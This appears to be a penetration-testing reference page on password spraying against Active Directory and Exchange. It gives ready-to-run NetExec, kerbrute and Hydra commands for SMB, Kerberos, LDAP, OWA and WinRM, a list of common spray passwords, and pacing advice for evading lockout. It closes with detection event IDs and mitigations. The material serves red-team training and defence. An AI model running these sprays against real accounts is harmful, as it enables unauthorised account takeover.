Password Spraying

Overview

Password spraying tests one or a few common passwords against many accounts simultaneously, rather than many passwords against one account. This avoids account lockout — if the lockout threshold is 5 attempts, spraying 1 password across 1000 users triggers 0-1 failures per account. Password spraying is highly effective in enterprise environments where users choose weak passwords that meet minimum complexity (e.g., Season+Year!, Company2024!).

ATT&CK Mapping

  • Tactic: TA0006 - Credential Access
  • Technique: T1110.003 - Brute Force: Password Spraying

Prerequisites

  • List of valid usernames (from AD enumeration, email harvesting, LinkedIn)
  • Knowledge of the domain's password policy (lockout threshold, observation window)
  • Network access to authentication services (SMB, Kerberos, OWA, LDAP)

Techniques

Password Policy Enumeration

Before spraying, check the lockout threshold:

# NetExec — domain password policy
# https://github.com/Pennyw0rth/NetExec
nxc smb <DC_IP> -u <user> -p <password> --pass-pol

# enum4linux-ng
# https://github.com/cddmp/enum4linux-ng
enum4linux-ng -P -u <user> -p <password> <DC_IP>

:: From a domain-joined Windows machine
net accounts /domain

Key values: - Lockout threshold — attempts before lockout (0 = no lockout, dangerous for spraying without limit) - Observation window — time before failed count resets - Lockout duration — how long account stays locked

SMB Spraying

# NetExec
# https://github.com/Pennyw0rth/NetExec
# Spray one password against all users
nxc smb <DC_IP> -u users.txt -p 'Summer2024!' -d <domain>

# Multiple passwords (one at a time with delay between rounds)
nxc smb <DC_IP> -u users.txt -p 'Summer2024!' -d <domain>
# Wait for observation window to reset, then:
nxc smb <DC_IP> -u users.txt -p 'Welcome1!' -d <domain>

# Continue testing after finding valid credentials
nxc smb <DC_IP> -u users.txt -p 'Summer2024!' -d <domain> --continue-on-success

# Spray with NTLM hash
nxc smb <DC_IP> -u users.txt -H '<NThash>' -d <domain>

Kerberos Spraying

Kerberos spraying is stealthier than SMB — failed attempts generate different event IDs and may bypass some monitoring:

# kerbrute
# https://github.com/ropnop/kerbrute
kerbrute passwordspray -d <domain> --dc <DC_IP> users.txt 'Summer2024!'

LDAP Spraying

# NetExec
# https://github.com/Pennyw0rth/NetExec
nxc ldap <DC_IP> -u users.txt -p 'Summer2024!' -d <domain>

OWA/Exchange Spraying

Outlook Web Access is internet-facing and often not subject to the same lockout monitoring:

# Hydra
# https://github.com/vanhauser-thc/thc-hydra
hydra -L users.txt -p 'Summer2024!' <target> http-post-form "/owa/auth.owa:destination=https%3A%2F%2F<target>%2Fowa&username=<domain>%5C^USER^&password=^PASS^:failed"

WinRM Spraying

# NetExec
# https://github.com/Pennyw0rth/NetExec
nxc winrm <target> -u users.txt -p 'Summer2024!' -d <domain>

# (Pwn3d!) = user can execute commands via WinRM

Common Spray Passwords

Effective spray passwords follow patterns that satisfy typical complexity requirements (uppercase + lowercase + number + special):

Season+Year:     Spring2024!, Summer2024!, Winter2024!
Company+Number:  Company123!, Company2024!
Welcome:         Welcome1!, Welcome123!
Password:        Password1!, P@ssw0rd!, P@ssword1
Month+Year:      January2024!, February2024!
City+Number:     London2024!, NewYork123!

Spraying Strategy

  1. Check password policy — know the lockout threshold and observation window
  2. Start with 1 password across all users
  3. Wait for the full observation window to reset (typically 30 minutes)
  4. Spray the next password
  5. Never exceed (threshold - 1) attempts per observation window
  6. Log all attempts to avoid re-testing

Detection Methods

Network-Based Detection

  • Many authentication attempts from a single source IP using different usernames
  • Authentication attempts against many accounts within a short time window
  • Off-hours authentication patterns

Host-Based Detection

  • Windows Event ID 4625 — failed logon from many accounts with the same source
  • Windows Event ID 4771 — Kerberos pre-authentication failures across accounts
  • Correlation: single source IP + many users + 1-2 failed attempts each

Mitigation Strategies

  • Smart lockout — Azure AD Smart Lockout locks familiar vs unfamiliar locations differently
  • Multi-factor authentication — prevents access even with a valid password
  • Password blacklists — block common spray passwords (Season+Year, Company+Number patterns)
  • Monitoring and alerting — alert on distributed failed logon patterns (many users, few failures each)
  • Conditional Access — block authentication from unexpected locations or devices

References

Official Documentation

MITRE ATT&CK